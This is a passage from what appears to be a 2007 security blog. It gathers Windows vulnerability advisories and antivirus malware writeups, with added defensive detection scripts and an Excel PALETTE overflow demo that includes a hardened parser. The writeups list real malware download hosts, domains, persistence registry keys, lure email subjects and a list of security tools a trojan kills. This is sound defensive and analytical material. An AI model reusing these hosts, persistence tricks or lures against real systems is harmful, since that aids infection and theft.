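            if ($ex.InnerException) { $ex = $ex.InnerException }
            if ($ex -is [System.UnauthorizedAccessException]) { return $true }   # exists, not ours
        }
    }
    return $false
}

function Get-IndicatorHits {
    foreach ($i in $Indicators) {
        $hit = switch ($i.Kind) {
            'RegistryKey' { Test-Path -Path $i.Path -ErrorAction SilentlyContinue }
            'File'        { Test-Path -Path $i.Path -PathType Leaf -ErrorAction SilentlyContinue }
            'Mutex'       { Test-NamedMutex -Name $i.Name }
            'RunValue'    { $null -ne (Get-ItemProperty -Path $i.Path -Name $i.Name -ErrorAction SilentlyContinue) }
        }
        if ($hit) {
            [pscustomobject]@{ Family = $i.Family; Kind = $i.Kind; Indicator = "$($i.Path) $($i.Name)".Trim() }
        }
    }
}

function Find-LookalikeProcess {
    # Poebot-KN's "spooIsv.exe" (capital I) imitates the print spooler "spoolsv.exe".
    # Fold the l/I/1/| lookalikes to one letter and compare against known system names.
    param([string[]]$ProcessNames = (Get-Process | Select-Object -ExpandProperty Name))
    $legit = @('spoolsv', 'svchost', 'lsass', 'csrss', 'winlogon', 'explorer')
    foreach ($name in $ProcessNames) {
        $base   = [System.IO.Path]::GetFileNameWithoutExtension($name).ToLowerInvariant()
        $folded = $base -replace '[il1|]', 'l'
        foreach ($real in $legit) {
            if ($base -ne $real -and $folded -eq ($real -replace '[il1|]', 'l')) {
                [pscustomobject]@{ Process = $name; Imitates = "$real.exe" }
            }
        }
    }
}

# Lure subjects and attachment names copied from the Zhelatin.CQ description.
$LureSubjects = @(
    'USA Declares War on Iran', 'USA Missle Strike: Iran War just have started',
    'Missle Strike: The USA kills more then 20000 Iranian citizens',
    'Missle Strike: The USA kills more then 1000 Iranian citizens',
    'Missle Strike: The USA kills more then 10000 Iranian citizens',
    'Israel Just Have Started World War III', 'USA Just Have Started World War III',
    'Iran Just Have Started World War III'
)
$LureAttachments = @('More.exe', 'Read More.exe', 'Click Here.exe', 'Click Me.exe',
                     'Read Me.exe', 'Movie.exe', 'News.exe', 'Video.exe')

function Test-ZhelatinLure {
    # True when a message's subject or attachment name matches the worm's lists (case-insensitive).
    param([string]$Subject = '', [string]$AttachmentName = '')
    return (($LureSubjects -contains $Subject.Trim()) -or ($LureAttachments -contains $AttachmentName.Trim()))
}

# Usage: Get-IndicatorHits; Find-LookalikeProcess; Test-ZhelatinLure -Subject 'USA Declares War on Iran'
```

Because the Zhelatin component hides its own registry keys and process, a clean result from Get-IndicatorHits on a live system is not proof of absence; the description says an anti-rootkit engine is needed to reveal them, so the registry and file checks are most reliable when run against an offline image or after the rootkit driver has been neutralised. The mutex probe is not affected by registry hiding and is a useful second signal.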
Microsoft Windows Animated Cursor Handling Vulnerability
".. any web page, email or content that can load an animated cursor can allow an attacker to take advantage of the vulnerability and run arbitrary code on the users system."
A short overview by SANS of how the different email clients are reacting to the animated cursor vulnerability.
An unofficial fix for the animated cursor vulnerability from Eeye.
Related Articles:
Microsoft confirms animated-cursor flaw: Microsoft confirmed on Thursday that attacker could take control of a user's system by exploiting a flaw in the way the company's Windows software handles animated-cursor files.
========================================
http://secunia.com/advisories/24659/
Microsoft Windows Animated Cursor Handling Vulnerability
Secunia Advisory: SA24659
Release Date: 2007-03-30
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
OS:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Storage Server 2003
Microsoft Windows Vista
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
CVE reference: CVE-2007-0038
Description:
A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an unspecified error in the handling of animated cursors and can e.g. be exploited by tricking a user into visiting a malicious website using Internet Explorer or opening a malicious e-mail message.
Successful exploitation allows execution of arbitrary code.
NOTE: The vulnerability is currently being actively exploited.
Solution:
Do not browse untrusted sites or view untrusted e-mails.
Provided and/or discovered by:
Discovered as a 0-day.
Independently discovered by Determina Security Research.
Original Advisory:
Microsoft: http://www.microsoft.com/technet/security/advisory/935423.mspx
http://blogs.technet.com/msrc/archive...-security-advisory-935423-posted.aspx
Determina:
http://www.determina.com/security_cen...ries/securityadvisory_0day_032907.asp
Other References:
US-CERT VU#191609:
http://www.kb.cert.org/vuls/id/191609
================================================================
Labels: Advisory, Microsoft, Virus, Vulnerability
Trojan.Linkoptimizer.B
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
CVE References: CVE-2003-0111, CVE-2005-4560, CVE-2006-0005, CVE-2006-3866, CVE-2006-4868, CVE-2006-6121
Trojan.Linkoptimizer.B is a generic detection for a family of Trojan horse programs that download dialer components, display pop-up advertisements and attempt to prevent removal by blocking security-related applications.
It has been reported that variants of Trojan.Linkoptimizer.B may be installed by visiting several different malicious Web sites while making legitimate searches on some popular search engines.
The initial domains returned by search engines may redirect users to other .com domains with random names which host different browser exploits.
Variants of Trojan.Linkoptimizer.B are installed by exploiting browser vulnerabilities including the following:
Microsoft Java Virtual Machine Bytecode Verifier Vulnerability (Security Focus Bugtraq ID 6221)
Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability (Security Focus Bugtraq ID 16644)
Microsoft WMF Remote Code Execution Vulnerability (Security Focus Bugtraq ID 16074).
Microsoft Internet Explorer VML Remote Code Execution Vulnerability (Security Focus Bugtraq ID 20096).
Acer LunchApp.APlunch ActiveX Control Remote Code Execution Vulnerability (Security Focus Bugtraq ID 21207)
NOTE: At the time of writing, it has been reported that the installation of Trojan.Linkoptimizer.B and its variants works only for users with Italian IP addresses.
The exploits drop an executable file in the following folder:
%Temp%\[RANDOM NAME1].exe
Once executed, the variants of Trojan.Linkoptimizer.B create the following mutexes to ensure that only one copy of the threat is running on the compromised computer:
_x_mgr_
_x_hlp_
The variants may check whether a modem is installed on the compromised computer by retrieving the Remote Access devices and checking for the presence of one of the following strings, terminating if neither is found:
modem
isdn
It may create the following registry entries so that the threat is executed every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\"Debugger" = "%System%\[8 RANDOM LETTERS].[EXT]"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\"Debugger" = "%System%\[FIXPART1][FIXPART2].exe"
NOTE: The security permissions of these keys are modified so that Administrator users will not be able to remove or change them.
The variants reportedly may create some of the following registry entries:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\"sr" = "[RANDOM HEXADECIMAL VALUE]"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared\"sr" = "[RANDOM HEXADECIMAL VALUE]"
It may create some of the following registry subkeys:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Macromedia\ShockPlayer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\[5 RANDOM LETTERS]
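The Image File Execution Options entries above are the persistence point worth checking on any suspect host: a "Debugger" value under IFEO\explorer.exe makes Windows launch that path in place of the shell at every logon, and this family also locks the key's ACL so an administrator cannot simply delete it. The script below is an added example, not part of the Symantec writeup. It runs over a constructed .reg-style export (the format produced by `reg export`) rather than a live registry, so it works on any platform; the sample Debugger paths and value names are made up for the example, while the marker subkeys and the "sr" value are the ones listed above.

```python
import re

# Constructed .reg-style export for this example; it is not a capture from an infected host.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]
"Debugger"="C:\\WINDOWS\\system32\\sysaudit.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Program Files\\Notepad++\\notepad++.exe\" -notepadStyleCmdline -z"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\WINDOWS\\system32\\SecurityHealthSystray.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared]
"sr"="1a2b3c4d"
"""

IFEO_PREFIX = ("hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\"
               "image file execution options\\")
# Images whose IFEO redirection fires at every logon; explorer.exe is the one this family uses.
CRITICAL_IMAGES = {"explorer.exe", "winlogon.exe", "userinit.exe", "taskmgr.exe"}

# Markers from the writeup, lower-cased for comparison. RFC1156Agent also exists on hosts
# with the SNMP service installed, so it is reported for review rather than as high.
MARKER_SUBKEYS = {
    "hkey_local_machine\\software\\microsoft\\rfc1156agent": "review",
    "hkey_local_machine\\software\\macromedia\\shockplayer32": "high",
}
MARKER_SUBKEY_PREFIX = "hkey_local_machine\\software\\microsoft\\internet explorer\\advancedoptions\\"
MARKER_VALUES = {
    ("hkey_local_machine\\software\\microsoft\\shared", "sr"),
    ("hkey_current_user\\software\\microsoft\\shared", "sr"),
}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_SZ_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s):
    """Undo .reg escaping of quotes and backslashes in REG_SZ names and data."""
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text):
    """Yield (key, name, data) for each REG_SZ value; a key line yields (key, None, None)."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            key = m.group(1)
            yield key, None, None
            continue
        m = _SZ_RE.match(line)
        if m and key is not None:
            yield key, _unescape(m.group(1)), _unescape(m.group(2))


def scan_reg_export(text):
    """Return (severity, finding, key, detail) tuples for IFEO redirections and the writeup's markers."""
    findings = []
    for key, name, data in parse_reg_export(text):
        k = key.lower()
        if name is None:
            if k in MARKER_SUBKEYS:
                findings.append((MARKER_SUBKEYS[k], "Linkoptimizer.B marker subkey", key, ""))
            elif k.startswith(MARKER_SUBKEY_PREFIX):
                findings.append(("high", "Linkoptimizer.B marker subkey", key, ""))
        elif k.startswith(IFEO_PREFIX) and name.lower() == "debugger":
            image = k[len(IFEO_PREFIX):].split("\\")[0]
            severity = "high" if image in CRITICAL_IMAGES else "review"
            findings.append((severity, "IFEO Debugger redirection", key, data))
        elif (k, name.lower()) in MARKER_VALUES:
            findings.append(("high", "Linkoptimizer.B marker value", key, f"{name}={data}"))
    return findings


if __name__ == "__main__":
    for severity, what, key, detail in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f"[{severity:6}] {what}: {key} {detail}".rstrip())
```

Every IFEO Debugger value is reported, because legitimate uses (an attached debugger, or the Notepad++ replacement of notepad.exe in the sample) are rare enough to review by hand; a redirection of explorer.exe or winlogon.exe is marked high. On a live host, an access-denied error when exporting an IFEO subkey is itself a finding, given the ACL change described above.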
The Trojan variants attempt to resolve the following domain:
aondskwje.com
NOTE: The numeric IP address obtained from the DNS server is invalid. The address is decrypted and converted to a different IP address value depending on the variant.
The variants may try to download the following encrypted file:
[http://]196.238.242.23/view/logo[REMOVED]
csr
ctf
drv
dsk
hlp
lsa
man
mod
mon
net
sql
srv
svc
sys
tsk
upd
win
While copying itself into the %System% folder, the variant appends a variable amount of random data to itself and patches the security permissions of the file. It then locks the file so that the malicious file cannot be accessed, deleted or renamed.
If the operating system is Windows XP, 2000 or 2003, the variants may start the Task Scheduler service and add the following task in order to run when Windows starts:
Run: %System%\[FIXED_STRING][5 RANDOM LETTERS].exe
Run as: NT AUTHORITY\System
Schedule: At System Startup
The task is saved in the following file and has the security permissions set to prevent removal.
%Windir%\Tasks\[5 RANDOM LETTERS].job
Next, the Trojan variants attempt to resolve one of the following domains:
itqoipyqsq.com
addwjf6zoy.com
c5ehm8fp.com
NOTE: The numeric IP address obtained from the DNS server is invalid. The address is decrypted and converted to a different IP address value depending on the variant.
The Trojan variant tries to download the following encrypted file:
[http://]85.255.115.133/styles/deskt[REMOVED]
NOTE: At the time of writing the file is downloaded only if the compromised machine has an Italian IP address. It has been observed that non-Italian IP addresses get a 500 error message from the remote Web server.
The downloaded file may install multiple dialer components that will dial high-cost numbers.
The Trojan.Linkoptimizer.B variant checks for the presence of debuggers or monitoring tools. It will not run on computers in a VMware environment or with any of the following drivers active:
SIWVIDSTART - Numega SoftICE Debugger
FILEMON - Sysinternals Filemon
REGMON - Sysinternals Regmon
PROCMON - Sysinternals Procmon
It may inject a thread into EXPLORER.EXE that attempts to terminate any program with the following text in its window title:
antidialer
avenger
avz antiviral
catchme
ccleaner
dumphive
gmer
hardware upgrade forum
hijackthis
listdlls
p2p forum italia
pjf(ustc)
restore ssdt
runalyzer
silent runners
suspectfile
swreg
Systemscan
unhook selected
unlockerassistant
It may create a copy of itself with one of the following names:
%System%\[8 RANDOM LETTERS].[EXT]
%System%\[FIXPART1][FIXPART2].exe
[EXT] is one of the following strings:
bak
dat
log
old
tmp
txt
ver
[FIXPART1] is one of the following strings:
admin
auto
boot
cfg
chat
defrag
demo
dump
edit
key
note
office
power
reg
run
set
sys
sys32
System
task
video
win
win32
[FIXPART2] is one of the following strings:
audit
backup
cache
check
clean
config
control
debug
event
find
info
init
load
lookup
mode
notify
setup
stat
tray
viewer
wizard
Variants of Trojan.Linkoptimizer.B have XML configuration data that can be updated from a remote site and that allows the variant to download or install multiple dialer components. The configuration data that can be updated includes high-cost numbers to dial with the following prefixes:
899
00881
The variant will also use the updated configuration data to contact one of the following URLs:
[http://]www.webcont.net/CONTENTS/adul[REMOVED]
[http://]www.keycont.net/CONTENTS/audl[REMOVED]
Updated configuration data will also include valid account information for the URLs dialed.
Writeup By: Elia Florio
Labels: Microsoft, Trojan, Virus
Windows Mail URL Bug Lets Remote Users Cause Existing Code on the Target User's System to Be Executed
SecurityTracker Alert ID: 1017816
SecurityTracker URL: http://securitytracker.com/id?1017816
CVE Reference: CVE-2007-1658
Date: Mar 26 2007
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Description: A vulnerability was reported in Windows Mail. A remote user can cause code to be executed on the target user's system without warning when the user clicks on a link.
A remote user can send an e-mail message containing a specially crafted link that, when loaded by the target user, will execute an arbitrary existing executable file located on the target user's system. The executable will run without warning and will run with the privileges of the target user.
Kingcope discovered this vulnerability.
Impact: A remote user can cause existing code located on the target user's system to be executed with the privileges of the target user when the user clicks on a specially crafted link.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/
Cause: State error
Underlying OS: Windows (Vista)
Reported By: "Kingcope"
Labels: Advisory, Microsoft, Vulnerability
Name Troj/DwnLdr-GSP
Type Trojan
Affected operating systems Windows
Side effects Downloads code from the internet
Aliases Trojan-Downloader.Win32.Small.bur
Troj/DwnLdr-GSP is a Trojan for the Windows platform.
Troj/DwnLdr-GSP includes functionality to communicate with a remote server via HTTP.
When Troj/DwnLdr-GSP is executed, it downloads and creates the file \mensagem.exe. This file is not available at the time of writing.
Labels: Microsoft, Trojan, Virus
Size: 11 kbytes (packed)
Discovered: 2007 Feb 14
SYMPTOMS:
- The presence of the following file: %WINDIR%\sqhos32.wmf
- The presence of the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run: "lre"="%path_to_trojan%"
- A process named 'module.exe' running
TECHNICAL DESCRIPTION:
The trojan creates a file named sqhos32.wmf in the %WINDIR% folder, a file containing data the trojan uses. It then creates the following registry key in order to execute itself at each system startup:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run: "lre"="%path_to_trojan%"
The trojan tries to download a file named 'module.exe' from http://eased{...}.com/et.exe.
When the link becomes available, it will execute the downloaded file, delete the startup registry key and mark itself for deletion at the next system startup.
ANALYZED BY:
Marius Botis, virus researcher
Labels: Microsoft, Trojan, Worm
Microsoft Excel Long Palette Heap Overflow Vulnerability
I. BACKGROUND
Microsoft Excel is the spreadsheet application from the Microsoft Office System. More information is available at the following link:
http://office.microsoft.com/
II. DESCRIPTION
Remote exploitation of a heap-based buffer overflow vulnerability in Microsoft Corp.'s Excel spreadsheet application could allow an attacker to execute arbitrary code in the context of the user who started Excel.
The vulnerability specifically exists in the handling of the PALETTE record in BIFF8 format spreadsheet files. By supplying a record with too many entries, an exploitable buffer overflow condition can occur.
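In a BIFF8 stream every record starts with a 2-byte type and a 2-byte length; the PALETTE body (type 0x0092) is a 2-byte colour count, ccv, followed by ccv 4-byte LongRGB entries, and Excel's palette holds 56 colours. A record whose declared length is consistent with ccv still overflows a 56-slot table if the parser trusts ccv alone, which is the "too many entries" case above. The following is an added example written for this page, not Excel's code or iDefense's proof of concept: it builds PALETTE records, shows the unchecked copy spilling into a modelled neighbouring heap allocation, and gives the hardened parser that bounds ccv by both the record length and the palette size. The 16-byte NEIGHBOUR value is a stand-in for whatever Excel actually allocates after the palette.

```python
import struct

PALETTE_RECORD = 0x0092     # BIFF8 record type for PALETTE
PALETTE_SLOTS = 56          # Excel's colour palette holds 56 entries (BIFF8)
ENTRY_SIZE = 4              # each entry is a LongRGB: red, green, blue, reserved
NEIGHBOUR = bytes(range(0xA0, 0xB0))  # stands in for the allocation that follows the palette on the heap


class PaletteOverflow(ValueError):
    """Raised by the hardened parser when ccv exceeds the palette size."""


def build_palette_record(colours):
    """Serialise a PALETTE record (header + body) from (r, g, b) tuples; used to construct test input."""
    body = struct.pack("<H", len(colours))
    body += b"".join(struct.pack("<BBBB", r, g, b, 0) for r, g, b in colours)
    return struct.pack("<HH", PALETTE_RECORD, len(body)) + body


def split_records(data):
    """Yield (record_type, body) for each record in a BIFF stream; the declared length must fit the data."""
    off = 0
    while off + 4 <= len(data):
        rtype, length = struct.unpack_from("<HH", data, off)
        off += 4
        if off + length > len(data):
            raise ValueError(f"record 0x{rtype:04x} declares {length} bytes, only {len(data) - off} remain")
        yield rtype, data[off:off + length]
        off += length


def parse_palette_unsafe(body):
    """The flawed pattern: allocate 56 slots, then copy ccv entries without checking ccv against 56.
    The heap is modelled as one bytearray so the overrun into NEIGHBOUR is visible in the result."""
    heap = bytearray(PALETTE_SLOTS * ENTRY_SIZE) + NEIGHBOUR
    ccv, = struct.unpack_from("<H", body, 0)
    entries = body[2:2 + ccv * ENTRY_SIZE]
    heap[0:len(entries)] = entries     # ccv > 56 writes past the palette into NEIGHBOUR
    return heap


def parse_palette(body):
    """Hardened parser: ccv is bounded by the palette size and by the record length before any copy."""
    if len(body) < 2:
        raise ValueError("PALETTE body shorter than the ccv field")
    ccv, = struct.unpack_from("<H", body, 0)
    if ccv > PALETTE_SLOTS:
        raise PaletteOverflow(f"ccv={ccv} exceeds the {PALETTE_SLOTS}-entry palette")
    if 2 + ccv * ENTRY_SIZE > len(body):
        raise ValueError(f"ccv={ccv} needs {2 + ccv * ENTRY_SIZE} bytes, record body has {len(body)}")
    return [struct.unpack_from("<BBB", body, 2 + i * ENTRY_SIZE) for i in range(ccv)]


def palette_from_stream(data):
    """Return the parsed palette from a BIFF stream, or None if the stream has no PALETTE record."""
    for rtype, body in split_records(data):
        if rtype == PALETTE_RECORD:
            return parse_palette(body)
    return None


# Constructed inputs: a full but valid palette, and a well-formed record whose ccv is too large.
BENIGN_RECORD = build_palette_record([(i, 0, 0) for i in range(PALETTE_SLOTS)])
OVERSIZED_RECORD = build_palette_record([(0xCC, 0xCC, 0xCC)] * (PALETTE_SLOTS + 4))

if __name__ == "__main__":
    print("benign:", len(palette_from_stream(BENIGN_RECORD)), "colours")
    spilled = parse_palette_unsafe(OVERSIZED_RECORD[4:])[PALETTE_SLOTS * ENTRY_SIZE:]
    print("unsafe parser overwrote the neighbouring allocation with:", spilled.hex())
    try:
        palette_from_stream(OVERSIZED_RECORD)
    except PaletteOverflow as exc:
        print("hardened parser rejected it:", exc)
```

Note that the record-length check in split_records is not enough on its own: the oversized record declares its length honestly, so only the semantic cap on ccv stops the copy.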
III. ANALYSIS
Successful exploitation of this vulnerability would allow an attacker to execute arbitrary code in the context of the user who opened the document. In order to exploit this vulnerability, an attacker would need to convince the target to open an Excel spreadsheet file. Likely attack vectors include sending the file as an attachment in an email or linking to the file on a website.
Systems with a default install of Office 2000 will open Office documents, including Excel spreadsheet files, from websites without prompting the user. This allows an attacker to exploit this vulnerability without user interaction beyond visiting a website. Later versions of Office will not open these documents automatically unless the user has chosen this behavior.
IV. DETECTION
iDefense Labs have confirmed the existence of this vulnerability in Microsoft Excel 2003 with all service packs and security updates. Previous versions of Excel are also likely to be affected.
V. WORKAROUND
Do not follow links or open files from unknown sources or that you were not expecting to receive.
VI. VENDOR RESPONSE
Microsoft has addressed this vulnerability with Microsoft Security Bulletin MS07-002. A link to this bulletin can be found below.
http://www.microsoft.com/technet/security/bulletin/ms07-002.mspx
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0031 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
09/22/2006 Initial vendor notification
09/22/2006 Initial vendor response
01/09/2007 Coordinated public disclosure
IX. CREDIT
This vulnerability was discovered by Greg MacManus, iDefense Labs.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2006 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Labels: Microsoft, Vulnerability
Mar 19 2007 10:41AM
dh layereddefense com
=================================================
Layered Defense Research Advisory 18 March 2007
=================================================
1) Affected Software
F-Secure Anti-Virus Client Security Version 6.02
=================================================
2) Severity Rating:
Low risk
Impact: Local read write arbitrary memory, denial of service.
=================================================
3) Description of Vulnerability
A format string vulnerability was discovered within F-Secure Anti-Virus Client Security Version 6.02. The vulnerability is due to improper processing of format strings when processing Management Server name field. When special crafted format strings are entered into the Management Server name field under Communication settings an attacker can read/write arbitrary memory and at a minimum can cause a denial of service condition.
=================================================
4) Solution
Fix: http://support.f-secure.com/enu/corporate/downloads/hotfixes/av-cs-hotfixes.shtml
=================================================
5) Time Table:
11/20/2006 Reported Vulnerability to Vendor.
11/29/2006 Vendor acknowledged the vulnerability
03/01/2007 Vendor published hot fix
=================================================
6) Credits Discovered by Deral Heiland, www.LayeredDefense.com
=================================================
7) Reference
=================================================
8) About Layered Defense
Layered Defense is a group of security professionals who work together on ethical research, testing and training within the information security arena. http://www.layereddefense.com
=================================================
Labels: Anti-Virus, Microsoft, Vulnerability
W32.Zhosu@mm
Risk Level 1: Very Low
Discovered: March 20, 2007
Updated: March 21, 2007 4:02:06 AM
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
W32.Zhosu@mm is a worm that spreads by sending itself to email addresses that it finds in the Windows Address Book.
Symantec Security Response is currently investigating this threat and will post more information as it becomes available.
Threat Assessment
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Low
Distribution
Distribution Level: Low
Writeup By: Chen Yu
Labels: Microsoft, Virus, Worm
Trend Micro Antivirus UPX Parsing Kernel Divide by Zero Vulnerability
I. BACKGROUND
Trend Micro AntiVirus is a virus scanning engine included in a wide array of products by Trend Micro. Several examples of vulnerable products include PC-cillin and Internet Security Suite.
http://www.trendmicro.com/en/home/us/home.htm
II. DESCRIPTION
Remote exploitation of a divide by zero error in Trend Micro AntiVirus may allow attackers to cause a denial of service.
The vulnerability exists in the kernel driver, VsapiNT.sys. This driver is responsible for scanning various file formats for malicious content. The code that parses UPX files takes an integer value from an attacker supplied file and uses it as a divisor. This results in a divide by zero error in kernel mode. This causes a kernel fault resulting in a blue screen of death (BSOD).
III. ANALYSIS
Exploitation of this vulnerability results not only in a DoS of the Trend Micro process, but in an operating system crash.
There are several different attack vectors depending on which product is being targeted. Someone targeting a home user would need to convince a user to download a file from a website or an attachment from an email message. The user would then need to manually scan this file or save it and have the Trend Micro auto scan process scan it at some later time. If instead a mail gateway is being targeted this vulnerability can be exploited automatically by sending a malicious attachment through a gateway that uses Trend Micro to scan content.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Trend Micro AntiVirus version 14.10.1041, engine version 8.320.1003. Previous versions may also be affected.
V. WORKAROUND
iDefense is currently unaware of any workarounds for this issue.
VI. VENDOR RESPONSE
"To address this vulnerability, Trend Micro recommends customers to update to Virus Pattern File 4.335.00 or higher."
For more information, consult the Trend Micro Knowledge Base article at the link shown below.
http://esupport.trendmicro.com/support/viewxml.do?ContentID=EN-1034587
VII. CVE INFORMATION
A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.
VIII. DISCLOSURE TIMELINE
02/27/2007 Initial vendor notification
02/27/2007 Initial vendor response
03/14/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
Labels: Advisory, Anti-Virus, Microsoft, Vulnerability
Name Troj/Psychwa-S
Type Trojan
Affected operating systems Windows
Troj/Psychwa-S is a Trojan for the Windows platform.
Troj/Psychwa-S includes functionality to access the internet and communicate with a remote server via HTTP.
Labels: Anti-Virus, Microsoft, Trojan
Malware type: JavaScript
Aliases: No Alias Found
In the wild: Yes
Destructive: No
Language: English
Platform: Windows 98, ME, NT, 2000, XP, Server 2003, Mac OS X
Encrypted: No
Overall risk rating: Low
Reported infections: Low
Damage potential: High
Distribution potential: Low
Size of malware: 5,609 Bytes
Initial samples received on: Mar 16, 2007
Related to: TROJ_DLOADER.JHV
Payload 1: Steals information
Details:
This malicious JavaScript may be dropped by another malware. It may also be downloaded from the Internet, particularly by the malware TROJ_DLOADER.JHV.
It is used to steal information, such as login credentials, used in MySpace accounts. MySpace (www.myspace.com) is a popular social networking Web site that hosts profiles of users from all around the world.
This JavaScript uploads the stolen information to the URL http://BLOCKED}ofileawareness.com/logs4/connect.php. As a result, remote users may view and use the uploaded information for malicious purposes.
It runs on Mac OS X, Windows 98, ME, NT, 2000, XP, and Server 2003.
Analysis By: Carlo Panganiban
Labels: Anti-Virus, http, Microsoft, Trojan
An interesting analysis of the costs (to end users) of protecting media companies' intellectual property from their customers.
This includes:
Disabling of Functionality
Decreased Playback Quality
Denial-of-Service via Driver/Device Revocation
Decreased System Reliability
Increased Hardware Costs
Unnecessary CPU Resource Consumption (to quote: "In order to prevent active attacks, device drivers are required to poll the underlying hardware every 30ms for digital outputs and every 150 ms for analog ones to ensure that everything appears kosher. This means that even with nothing else happening in the system, a mass of assorted drivers has to wake up thirty times a second just to ensure that… nothing continues to happen (commenting on this mechanism, Leo Laporte in his Security Now podcast with Steve Gibson calls Vista “an operating system that is insanely paranoid”).")
Unnecessary Device Resource Consumption
Read the entire article here.
Labels: Microsoft, News Article
Name Troj/Singu-AQ
Type Spyware Trojan
Affected operating systems Windows
Side effects Steals information, Records keystrokes, Installs itself in the Registry, Installs a browser helper object
Troj/Singu-AQ is a password-stealing Trojan for the Windows platform.
When first run, Troj/Singu-AQ copies itself to \gdien32.exe and creates the following files:
\lmrtend.dll
\shlapi.dll
lmrtend.dll is also detected as Troj/Singu-AQ
shlapi.dll contains logged keypresses
The Trojan creates the following registry entries in order to be run automatically:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
gdien32
\gdien32.exe
lmrtend.dll is installed as a BHO (browser helper object).
Labels: Anti-Virus, Microsoft, Virus
As with any new Microsoft product, OneCare Anti-virus has problems. However, the competition should not take this to mean that they can rest easy. Microsoft has the staying power and determination to develop its products into world beaters. Once MS has come into a market, it will keep spending money until it dominates it.
Best quotes from this article:
"Usually Microsoft doesn't develop products, we buy products. It's not a bad product, but bits and pieces are missing,"
"OneCare is a new product — they shouldn't have rolled it out when they did, but they're fixing the problems now,"
"Microsoft is not a security company. Security is important, but it's just a little part of Microsoft,"
Ouch.
===================================
Microsoft: OneCare should not have been rolled out
Tom Espiner, ZDNet UK
Published: 16 Mar 2007 13:03 GMT
Microsoft has said that its OneCare security suite has "a problem" with the underlying antivirus code, and admitted that security is just "a little part of Microsoft".
Speaking to ZDNet UK exclusively at the CeBIT show in Hanover, a senior manager for the software giant said that its consumer security product is far from perfect and that pieces are actually "missing".
OneCare has been dogged by controversy since its launch last May. Signs that the software was not up to scratch came earlier this month when OneCare failed to achieve certification in an independent test of security products. Shortly before that, it emerged that the product did not sufficiently protect users of Microsoft's Vista operating system against malware.
But the latest and most serious problems arose in March this year after the product mistakenly quarantined and even deleted Outlook and Outlook Express files for the second time.
Microsoft apologised for the problems and has issued an update that has now been automatically pushed out to OneCare customers, to halt the false positive identification as malware of Outlook .pst and Outlook Express .dbx files.
Asked about these problems, Arno Edelmann, Microsoft's European business security product manager, told ZDNet UK on Thursday that the code itself has pieces missing.
"Usually Microsoft doesn't develop products, we buy products. It's not a bad product, but bits and pieces are missing," said Edelmann.
The problem lies with a core technology of OneCare, the GeCAD antivirus code, and how it interacts with Microsoft mailservers. According to Edelmann, the Microsoft updates and mailserver infrastructure do not harmonise.
